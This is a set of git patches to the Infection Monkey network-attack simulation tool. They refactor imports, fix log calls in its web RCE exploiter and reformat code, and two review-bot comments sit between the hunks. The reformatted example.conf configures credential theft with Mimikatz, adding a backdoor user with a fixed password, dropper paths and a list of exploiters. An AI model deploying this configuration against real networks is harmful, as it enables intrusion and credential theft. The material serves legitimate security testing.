diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py index 1b5b9d75b..672861355 100644 --- a/monkey/infection_monkey/exploit/web_rce.py +++ b/monkey/infection_monkey/exploit/web_rce.py @@ -4,9 +4,10 @@ from posixpath import join from abc import abstractmethod from infection_monkey.exploit import HostExploiter -from infection_monkey.model import * from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.http_tools import HTTPTools +from infection_monkey.model import CHECK_COMMAND, ID_STRING, GET_ARCH_LINUX, GET_ARCH_WINDOWS, BITSADMIN_CMDLINE_HTTP, \ + POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD, DOWNLOAD_TIMEOUT, CHMOD_MONKEY, RUN_MONKEY, MONKEY_ARG, DROPPER_ARG from infection_monkey.network.tools import check_tcp_port, tcp_port_to_service from infection_monkey.telemetry.attack.t1197_telem import T1197Telem from common.utils.attack_utils import ScanStatus, BITS_UPLOAD_STRING diff --git a/monkey/infection_monkey/utils/users.py b/monkey/infection_monkey/utils/users.py index 68148d9e9..b2f29db85 100644 --- a/monkey/infection_monkey/utils/users.py +++ b/monkey/infection_monkey/utils/users.py @@ -6,5 +6,3 @@ def get_commands_to_add_user(username, password): linux_cmds = get_linux_commands_to_add_user(username) windows_cmds = get_windows_commands_to_add_user(username, password) return linux_cmds, windows_cmds - - diff --git a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py index 161f064b2..59bf1aa66 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py 
@@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY, EVENT_TYPE_MONKEY_NETWORK from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding diff --git a/monkey/monkey_island/cc/models/zero_trust/test_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_finding.py index 3b9dcbf33..d61478641 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_finding.py @@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import STATUS_FAILED, TEST_SEGMENTATION, EVENT_TYPE_MONKEY_NETWORK from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase diff --git a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py index d77e67aad..a43da8416 100644 --- a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py 
@@ -1,4 +1,9 @@ -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import AUTOMATION_ORCHESTRATION, DATA, PRINCIPLES, PRINCIPLE_DATA_TRANSIT, STATUS_FAILED, \ + TESTS_MAP, TEST_DATA_ENDPOINT_HTTP, TEST_EXPLANATION_KEY, STATUS_UNEXECUTED, TEST_DATA_ENDPOINT_ELASTIC, DEVICES, \ + PRINCIPLE_ENDPOINT_SECURITY, TEST_MACHINE_EXPLOITED, TEST_ENDPOINT_SECURITY_EXISTS, NETWORKS, PRINCIPLE_SEGMENTATION, \ + TEST_SEGMENTATION, PRINCIPLE_USER_BEHAVIOUR, STATUS_VERIFY, TEST_SCHEDULED_EXECUTION, PRINCIPLE_USERS_MAC_POLICIES, \ + TEST_COMMUNICATE_AS_NEW_USER, PRINCIPLE_ANALYZE_NETWORK_TRAFFIC, TEST_MALICIOUS_ACTIVITY_TIMELINE, \ + PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, TEST_TUNNELING, PEOPLE, VISIBILITY_ANALYTICS, WORKLOADS, STATUS_PASSED from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService from monkey_island.cc.testing.IslandTestCase import IslandTestCase diff --git a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py index 04f661b28..24bd81e0d 100644 --- a/monkey/monkey_island/cc/services/reporting/zero_trust_service.py +++ b/monkey/monkey_island/cc/services/reporting/zero_trust_service.py @@ -1,5 +1,8 @@ import json -from common.data.zero_trust_consts import * + +from common.data.zero_trust_consts import PILLARS, STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED, \ + PILLARS_TO_TESTS, TESTS_MAP, PILLARS_KEY, PRINCIPLES_TO_TESTS, PRINCIPLES_TO_PILLARS, PRINCIPLES, ORDERED_TEST_STATUSES, \ + TEST_EXPLANATION_KEY, FINDING_EXPLANATION_BY_STATUS_KEY from monkey_island.cc.models.zero_trust.finding import Finding diff --git a/monkey/monkey_island/cc/services/telemetry/processing/__init__.py b/monkey/monkey_island/cc/services/telemetry/processing/__init__.py index 966877967..e69de29bb 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/__init__.py 
+++ b/monkey/monkey_island/cc/services/telemetry/processing/__init__.py @@ -1,7 +0,0 @@ -# import all implemented hooks, for brevity of hooks.py file -from .tunnel import process_tunnel_telemetry -from .state import process_state_telemetry -from .exploit import process_exploit_telemetry -from .scan import process_scan_telemetry -from .system_info import process_system_info_telemetry -from .post_breach import process_post_breach_telemetry diff --git a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py index c64849905..b0e2eb8b7 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py @@ -1,5 +1,5 @@ +from common.data.post_breach_consts import POST_BREACH_COMMUNICATE_AS_NEW_USER from monkey_island.cc.database import mongo -from common.data.post_breach_consts import * from monkey_island.cc.models import Monkey from monkey_island.cc.services.telemetry.zero_trust_tests.communicate_as_new_user import test_new_user_communication diff --git a/monkey/monkey_island/cc/services/telemetry/processing/processing.py b/monkey/monkey_island/cc/services/telemetry/processing/processing.py index 36f75fdbd..f6ddcd970 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/processing.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/processing.py @@ -1,6 +1,7 @@ import logging -from monkey_island.cc.services.telemetry.processing import * +from monkey_island.cc.services.telemetry.processing import process_tunnel_telemetry, process_state_telemetry, \ + process_exploit_telemetry, process_scan_telemetry, process_system_info_telemetry, process_post_breach_telemetry logger = logging.getLogger(__name__) 
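Review bot: The new import in processing.py, `from monkey_island.cc.services.telemetry.processing import process_tunnel_telemetry, ...`, takes six functions from the package itself, but the same commit empties `processing/__init__.py`, which was the only place those names were re-exported. With `from package import name` Python falls back to importing `package.name` as a submodule when the attribute is absent, and no submodule by those names exists, so loading processing.py presumably raises ImportError after this commit unless a later change restores the re-exports. Import each function from the submodule that defines it instead, using the module names the removed `__init__.py` listed. The post_breach.py hunk on this line only reorders an import and needs nothing.
```python
import logging

from monkey_island.cc.services.telemetry.processing.exploit import process_exploit_telemetry
from monkey_island.cc.services.telemetry.processing.post_breach import process_post_breach_telemetry
from monkey_island.cc.services.telemetry.processing.scan import process_scan_telemetry
from monkey_island.cc.services.telemetry.processing.state import process_state_telemetry
from monkey_island.cc.services.telemetry.processing.system_info import process_system_info_telemetry
from monkey_island.cc.services.telemetry.processing.tunnel import process_tunnel_telemetry

logger = logging.getLogger(__name__)
```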
diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py index b4e0bb4ec..e6afcf088 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py @@ -1,7 +1,8 @@ import json from common.data.network_consts import ES_SERVICE -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import STATUS_PASSED, EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_DATA_ENDPOINT_HTTP, \ + TEST_DATA_ENDPOINT_ELASTIC from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py index 59ba296cd..fe0015576 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import * +from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED, STATUS_FAILED, TEST_MACHINE_EXPLOITED from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event From d69976f4b5a5c0c2af2d2996c60eab5371fb54ac Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 21:03:51 +0200 Subject: [PATCH 33/53] Fixed unresolved reference self.host instead of host --- monkey/infection_monkey/exploit/web_rce.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) 
diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py index 672861355..b894acf43 100644 --- a/monkey/infection_monkey/exploit/web_rce.py +++ b/monkey/infection_monkey/exploit/web_rce.py @@ -257,7 +257,7 @@ class WebRCE(HostExploiter): if 'No such file' in resp: return False else: - LOG.info("Host %s was already infected under the current configuration, done" % str(host)) + LOG.info("Host %s was already infected under the current configuration, done" % str(self.host)) return True def check_remote_files(self, url): @@ -285,7 +285,7 @@ class WebRCE(HostExploiter): """ ports = self.get_open_service_ports(ports, names) if not ports: - LOG.info("All default web ports are closed on %r, skipping", str(host)) + LOG.info("All default web ports are closed on %r, skipping", str(self.host)) return False else: return ports @@ -462,7 +462,7 @@ class WebRCE(HostExploiter): """ src_path = get_target_monkey(self.host) if not src_path: - LOG.info("Can't find suitable monkey executable for host %r", host) + LOG.info("Can't find suitable monkey executable for host %r", self.host) return False # Determine which destination path to use dest_path = self.get_monkey_upload_path(src_path) From 40494d3c3c2e3e2649685773cb316845c9242301 Mon Sep 17 00:00:00 2001 
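Review bot: The three corrected log calls are now inconsistent with each other: the first formats eagerly with `%` and wraps `self.host` in `str()`, the second passes `str(self.host)` to a `%r` placeholder (which logs the string with quotes around it), and the third passes `self.host` to `%r` directly. Using lazy logging arguments and one conversion throughout, e.g. `LOG.info("Host %s was already infected under the current configuration, done", self.host)` and `LOG.info("All default web ports are closed on %s, skipping", self.host)`, keeps the output uniform and avoids building the message when INFO is disabled. Since `host` was undefined before this fix, each of these branches presumably raised NameError whenever it was reached, so a regression test that drives the already-infected and no-open-ports paths would be worth adding alongside the fix. The enclosing methods of all three hunks begin and end outside the hunks.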
From: Shay Nehmad Date: Mon, 28 Oct 2019 21:11:05 +0200 Subject: [PATCH 34/53] Auto reformat all code --- monkey/infection_monkey/dropper.py | 2 +- monkey/infection_monkey/example.conf | 206 +++++++------- .../infection_monkey/exploit/elasticgroovy.py | 4 +- monkey/infection_monkey/exploit/mssqlexec.py | 7 +- monkey/infection_monkey/exploit/shellshock.py | 2 +- .../exploit/tools/exceptions.py | 2 - .../infection_monkey/exploit/tools/helpers.py | 2 +- .../exploit/tools/payload_parsing.py | 2 +- .../exploit/tools/smb_tools.py | 1 + monkey/infection_monkey/exploit/weblogic.py | 3 - .../infection_monkey/exploit/win_ms08_067.py | 10 +- monkey/infection_monkey/exploit/wmiexec.py | 1 - monkey/infection_monkey/model/__init__.py | 24 +- monkey/infection_monkey/monkey.py | 2 +- monkey/infection_monkey/network/info.py | 1 - .../network/mssql_fingerprint.py | 1 - .../infection_monkey/network/tcp_scanner.py | 1 - .../post_breach/actions/users_custom_pba.py | 1 + monkey/infection_monkey/post_breach/pba.py | 2 +- .../post_breach/post_breach_handler.py | 1 + monkey/infection_monkey/pyinstaller_utils.py | 1 - .../system_info/linux_info_collector.py | 1 - .../system_info/windows_info_collector.py | 1 + .../system_info/wmi_consts.py | 1 - monkey/infection_monkey/system_singleton.py | 1 - monkey/infection_monkey/transport/__init__.py | 1 - monkey/infection_monkey/transport/tcp.py | 4 +- monkey/monkey_island/cc/app.py | 1 - monkey/monkey_island/cc/island_logger.py | 1 - .../cc/island_logger_default_config.json | 60 ++--- monkey/monkey_island/cc/main.py | 1 + monkey/monkey_island/cc/models/monkey.py | 1 + monkey/monkey_island/cc/models/test_monkey.py | 1 - .../cc/models/zero_trust/test_finding.py | 1 + .../cc/resources/attack/attack_config.py | 1 - .../monkey_island/cc/resources/local_run.py | 1 + monkey/monkey_island/cc/resources/monkey.py | 1 + monkey/monkey_island/cc/resources/netmap.py | 2 - .../cc/resources/pba_file_download.py | 1 + .../cc/resources/pba_file_upload.py | 1 + 
.../cc/resources/reporting/report.py | 9 +- .../cc/resources/representations_test.py | 12 +- .../cc/resources/telemetry_feed.py | 4 +- .../cc/resources/test/log_test.py | 1 - monkey/monkey_island/cc/server_config.json | 4 +- .../cc/services/attack/attack_report.py | 3 +- .../attack/technique_reports/T1003.py | 1 - .../attack/technique_reports/T1005.py | 1 - .../attack/technique_reports/T1016.py | 1 - .../attack/technique_reports/T1018.py | 1 - .../attack/technique_reports/T1021.py | 1 - .../attack/technique_reports/T1041.py | 1 - .../attack/technique_reports/T1059.py | 1 - .../attack/technique_reports/T1065.py | 1 - .../attack/technique_reports/T1075.py | 1 - .../attack/technique_reports/T1082.py | 23 +- .../attack/technique_reports/T1086.py | 1 - .../attack/technique_reports/T1090.py | 3 - .../attack/technique_reports/T1105.py | 1 - .../attack/technique_reports/T1110.py | 2 - .../attack/technique_reports/T1188.py | 1 - .../attack/technique_reports/T1210.py | 5 +- monkey/monkey_island/cc/services/config.py | 5 +- monkey/monkey_island/cc/services/database.py | 2 - .../monkey_island/cc/services/island_logs.py | 1 + .../cc/services/mimikatz_utils.py | 1 - .../cc/services/remote_run_aws.py | 2 +- .../cc/services/reporting/aws_exporter.py | 32 +-- .../cc/services/reporting/exporter_init.py | 1 + .../cc/services/reporting/test_pth_report.py | 3 - .../reporting/test_zero_trust_service.py | 2 +- .../telemetry/processing/post_breach.py | 1 - .../zero_trust_tests/segmentation.py | 8 +- .../cc/services/version_update.py | 1 - .../monkey_island/cc/services/wmi_handler.py | 2 - monkey/monkey_island/cc/ui/.babelrc | 10 +- monkey/monkey_island/cc/ui/.eslintrc | 12 +- monkey/monkey_island/cc/ui/karma.conf.js | 14 +- monkey/monkey_island/cc/ui/server.js | 14 +- .../src/components/attack/MatrixComponent.js | 64 ++--- .../components/attack/techniques/Helpers.js | 81 +++--- .../src/components/attack/techniques/T1003.js | 3 +- .../src/components/attack/techniques/T1005.js | 23 +- 
.../src/components/attack/techniques/T1016.js | 24 +- .../src/components/attack/techniques/T1018.js | 37 ++- .../src/components/attack/techniques/T1021.js | 22 +- .../src/components/attack/techniques/T1035.js | 10 +- .../src/components/attack/techniques/T1041.js | 16 +- .../src/components/attack/techniques/T1059.js | 27 +- .../src/components/attack/techniques/T1064.js | 10 +- .../src/components/attack/techniques/T1075.js | 29 +- .../src/components/attack/techniques/T1082.js | 24 +- .../src/components/attack/techniques/T1086.js | 27 +- .../src/components/attack/techniques/T1090.js | 17 +- .../src/components/attack/techniques/T1105.js | 21 +- .../src/components/attack/techniques/T1106.js | 10 +- .../src/components/attack/techniques/T1107.js | 32 ++- .../src/components/attack/techniques/T1110.js | 28 +- .../src/components/attack/techniques/T1129.js | 8 +- .../src/components/attack/techniques/T1145.js | 35 +-- .../src/components/attack/techniques/T1188.js | 33 ++- .../src/components/attack/techniques/T1197.js | 48 ++-- .../src/components/attack/techniques/T1210.js | 74 ++--- .../src/components/attack/techniques/T1222.js | 19 +- .../map/preview-pane/InfMapPreviewPane.js | 16 +- .../map/preview-pane/PreviewPane.js | 16 +- .../ui/src/components/pages/ConfigurePage.js | 254 ++++++++++-------- .../cc/ui/src/components/pages/LicensePage.js | 4 +- .../cc/ui/src/components/pages/MapPage.js | 25 +- .../components/pages/PassTheHashMapPage.js | 8 +- .../cc/ui/src/components/pages/ReportPage.js | 187 +++++++------ .../ui/src/components/pages/RunMonkeyPage.js | 49 ++-- .../ui/src/components/pages/StartOverPage.js | 15 +- .../ui/src/components/pages/TelemetryPage.js | 66 ++--- .../common/PaginatedTable.js | 3 +- .../security/AttackReport.js | 55 ++-- .../security/BreachedServers.js | 10 +- .../report-components/security/PostBreach.js | 30 +-- .../security/ScannedServers.js | 14 +- .../security/StolenPasswords.js | 6 +- .../report-components/security/StrongUsers.js | 8 +- 
.../zerotrust/EventsButton.js | 14 +- .../zerotrust/EventsModal.js | 6 +- .../zerotrust/EventsTimeline.js | 4 +- .../zerotrust/PillarLabel.js | 3 +- .../zerotrust/PrinciplesStatusTable.js | 13 +- .../zerotrust/ReportLegend.js | 8 +- .../zerotrust/SinglePillarPrinciplesStatus.js | 6 +- .../zerotrust/StatusesToPillarsSummary.js | 10 +- .../zerotrust/SummarySection.js | 7 +- .../src/components/run-monkey/AwsRunTable.js | 12 +- .../src/components/ui-components/Checkbox.js | 99 +++---- monkey/monkey_island/cc/ui/src/config/base.js | 3 +- .../cc/ui/src/images/infection-monkey.svg | 47 ++-- .../cc/ui/src/images/monkey-icon.svg | 11 +- .../zerotrust/im-alert-machine-icon.svg | 14 +- .../zerotrust/im-alert-network-icon.svg | 24 +- monkey/monkey_island/cc/ui/src/index.html | 2 +- monkey/monkey_island/cc/ui/src/index.js | 2 +- .../cc/ui/src/server_config/AwsConfig.js | 2 +- .../cc/ui/src/server_config/PasswordConfig.js | 2 +- .../cc/ui/src/server_config/StandardConfig.js | 2 +- .../cc/ui/src/services/AuthService.js | 5 +- monkey/monkey_island/cc/ui/src/styles/App.css | 37 +-- .../cc/ui/src/styles/Checkbox.scss | 137 +++++----- .../cc/ui/src/styles/Collapse.scss | 13 +- monkey/monkey_island/cc/utils.py | 2 +- 147 files changed, 1370 insertions(+), 1150 deletions(-) diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index 0fc6dd10a..55a359b60 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -114,7 +114,7 @@ class MonkeyDrops(object): except OSError: LOG.warning("Cannot set reference date to destination file") - monkey_options =\ + monkey_options = \ build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth) if OperatingSystem.Windows == SystemInfoCollector.get_os(): diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf index 194e18625..4fb0200c8 100644 --- a/monkey/infection_monkey/example.conf 
+++ b/monkey/infection_monkey/example.conf 
@@ -1,109 +1,109 @@ { - "should_exploit": true, - "command_servers": [ - "192.0.2.0:5000" - ], - "internet_services": [ - "monkey.guardicore.com", - "www.google.com" - ], - "keep_tunnel_open_time": 60, - "subnet_scan_list": [ + "should_exploit": true, + "command_servers": [ + "192.0.2.0:5000" + ], + "internet_services": [ + "monkey.guardicore.com", + "www.google.com" + ], + "keep_tunnel_open_time": 60, + "subnet_scan_list": [ - ], - "inaccessible_subnets": [], - "blocked_ips": [], - "current_server": "192.0.2.0:5000", - "alive": true, - "collect_system_info": true, - "extract_azure_creds": true, - "should_use_mimikatz": true, - "depth": 2, + ], + "inaccessible_subnets": [], + "blocked_ips": [], + "current_server": "192.0.2.0:5000", + "alive": true, + "collect_system_info": true, + "extract_azure_creds": true, + "should_use_mimikatz": true, + "depth": 2, - "dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll", - "dropper_date_reference_path_linux": "/bin/sh", - "dropper_log_path_windows": "%temp%\\~df1562.tmp", - "dropper_log_path_linux": "/tmp/user-1562", - "dropper_set_date": true, - "dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe", - "dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe", - "dropper_target_path_linux": "/tmp/monkey", + "dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll", + "dropper_date_reference_path_linux": "/bin/sh", + "dropper_log_path_windows": "%temp%\\~df1562.tmp", + "dropper_log_path_linux": "/tmp/user-1562", + "dropper_set_date": true, + "dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe", + "dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe", + "dropper_target_path_linux": "/tmp/monkey", - "monkey_dir_name": "monkey_dir", + "monkey_dir_name": "monkey_dir", - "kill_file_path_linux": "/var/run/monkey.not", - "kill_file_path_windows": "%windir%\\monkey.not", - "dropper_try_move_first": true, - "exploiter_classes": [ - "SSHExploiter", - "SmbExploiter", 
- "WmiExploiter", - "ShellShockExploiter", - "ElasticGroovyExploiter", - "SambaCryExploiter", - "Struts2Exploiter", - "WebLogicExploiter", - "HadoopExploiter", - "VSFTPDExploiter", - "MSSQLExploiter" - ], - "finger_classes": [ - "SSHFinger", - "PingScanner", - "HTTPFinger", - "SMBFinger", - "MySQLFinger", - "MSSQLFingerprint", - "ElasticFinger" - ], - "max_iterations": 3, - "monkey_log_path_windows": "%temp%\\~df1563.tmp", - "monkey_log_path_linux": "/tmp/user-1563", - "send_log_to_server": true, - "ms08_067_exploit_attempts": 5, - "user_to_add": "Monkey_IUSER_SUPPORT", - "remote_user_pass": "Password1!", - "ping_scan_timeout": 10000, - "smb_download_timeout": 300, - "smb_service_name": "InfectionMonkey", - "retry_failed_explotation": true, - "self_delete_in_cleanup": true, - "serialize_config": false, - "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}", - "skip_exploit_if_file_exist": false, - "exploit_user_list": [], - "exploit_password_list": [], - "exploit_lm_hash_list": [], - "exploit_ntlm_hash_list": [], - "exploit_ssh_keys": [], - "sambacry_trigger_timeout": 5, - "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"], - "sambacry_shares_not_to_check": ["IPC$", "print$"], - "local_network_scan": false, - "tcp_scan_get_banner": true, - "tcp_scan_interval": 0, - "tcp_scan_timeout": 10000, - "tcp_target_ports": [ - 22, - 445, - 135, - 3389, - 80, - 8080, - 443, - 3306, - 8008, - 9200, - 7001, - 8088 - ], - "timeout_between_iterations": 10, - "use_file_logging": true, - "victims_max_exploit": 15, - "victims_max_find": 100, - "post_breach_actions" : [] - custom_PBA_linux_cmd = "" - custom_PBA_windows_cmd = "" - PBA_linux_filename = None - PBA_windows_filename = None + "kill_file_path_linux": "/var/run/monkey.not", + "kill_file_path_windows": "%windir%\\monkey.not", + "dropper_try_move_first": true, + "exploiter_classes": [ + "SSHExploiter", + "SmbExploiter", + "WmiExploiter", + 
"ShellShockExploiter", + "ElasticGroovyExploiter", + "SambaCryExploiter", + "Struts2Exploiter", + "WebLogicExploiter", + "HadoopExploiter", + "VSFTPDExploiter", + "MSSQLExploiter" + ], + "finger_classes": [ + "SSHFinger", + "PingScanner", + "HTTPFinger", + "SMBFinger", + "MySQLFinger", + "MSSQLFingerprint", + "ElasticFinger" + ], + "max_iterations": 3, + "monkey_log_path_windows": "%temp%\\~df1563.tmp", + "monkey_log_path_linux": "/tmp/user-1563", + "send_log_to_server": true, + "ms08_067_exploit_attempts": 5, + "user_to_add": "Monkey_IUSER_SUPPORT", + "remote_user_pass": "Password1!", + "ping_scan_timeout": 10000, + "smb_download_timeout": 300, + "smb_service_name": "InfectionMonkey", + "retry_failed_explotation": true, + "self_delete_in_cleanup": true, + "serialize_config": false, + "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}", + "skip_exploit_if_file_exist": false, + "exploit_user_list": [], + "exploit_password_list": [], + "exploit_lm_hash_list": [], + "exploit_ntlm_hash_list": [], + "exploit_ssh_keys": [], + "sambacry_trigger_timeout": 5, + "sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"], + "sambacry_shares_not_to_check": ["IPC$", "print$"], + "local_network_scan": false, + "tcp_scan_get_banner": true, + "tcp_scan_interval": 0, + "tcp_scan_timeout": 10000, + "tcp_target_ports": [ + 22, + 445, + 135, + 3389, + 80, + 8080, + 443, + 3306, + 8008, + 9200, + 7001, + 8088 + ], + "timeout_between_iterations": 10, + "use_file_logging": true, + "victims_max_exploit": 15, + "victims_max_find": 100, + "post_breach_actions": [] + custom_PBA_linux_cmd = "" + custom_PBA_windows_cmd = "" + PBA_linux_filename = None + PBA_windows_filename = None } diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py index c8f897dd2..f66a58ab0 100644 --- a/monkey/infection_monkey/exploit/elasticgroovy.py 
+++ b/monkey/infection_monkey/exploit/elasticgroovy.py @@ -8,7 +8,7 @@ import json import logging import requests from infection_monkey.exploit.web_rce import WebRCE -from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\ +from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX, \ DOWNLOAD_TIMEOUT from infection_monkey.network.elasticfinger import ES_PORT from common.data.network_consts import ES_SERVICE @@ -83,7 +83,7 @@ class ElasticGroovyExploiter(WebRCE): # Overridden web_rce method that adds CMD prefix for windows command try: if 'windows' in self.host.os['type']: - resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND) + resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND) else: resp = self.exploit(url, CHECK_COMMAND) if resp is True: diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index dcad2adf1..c8982a7e2 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -17,7 +17,6 @@ LOG = logging.getLogger(__name__) class MSSQLExploiter(HostExploiter): - _EXPLOITED_SERVICE = 'MSSQL' _TARGET_OS_TYPE = ['windows'] EXPLOIT_TYPE = ExploitType.BRUTE_FORCE @@ -143,7 +142,7 @@ class MSSQLExploiter(HostExploiter): def get_monkey_download_command(self): dst_path = get_monkey_dest_path(self.monkey_server.http_path) - monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.\ + monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND. \ format(http_path=self.monkey_server.http_path, dst_path=dst_path) prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path) 
@@ -192,5 +191,5 @@ class MSSQLLimitedSizePayload(LimitedSizePayload): def __init__(self, command, prefix="", suffix=""): super(MSSQLLimitedSizePayload, self).__init__(command=command, max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE, - prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START+prefix, - suffix=suffix+MSSQLExploiter.XP_CMDSHELL_COMMAND_END) + prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix, + suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END) diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py index edc4851e9..932d94b77 100644 --- a/monkey/infection_monkey/exploit/shellshock.py +++ b/monkey/infection_monkey/exploit/shellshock.py @@ -132,7 +132,7 @@ class ShellShockExploiter(HostExploiter): self._remove_lock_file(exploit, url, header) if (http_thread.downloads != 1) or ( - 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): + 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) continue diff --git a/monkey/infection_monkey/exploit/tools/exceptions.py b/monkey/infection_monkey/exploit/tools/exceptions.py index eabe8d9d7..d37ab9e53 100644 --- a/monkey/infection_monkey/exploit/tools/exceptions.py +++ b/monkey/infection_monkey/exploit/tools/exceptions.py @@ -1,5 +1,3 @@ - - class ExploitingVulnerableMachineError(Exception): """ Raise when exploiter failed, but machine is vulnerable""" pass diff --git a/monkey/infection_monkey/exploit/tools/helpers.py b/monkey/infection_monkey/exploit/tools/helpers.py index 91a25c270..5e4b43b20 100644 --- a/monkey/infection_monkey/exploit/tools/helpers.py +++ b/monkey/infection_monkey/exploit/tools/helpers.py 
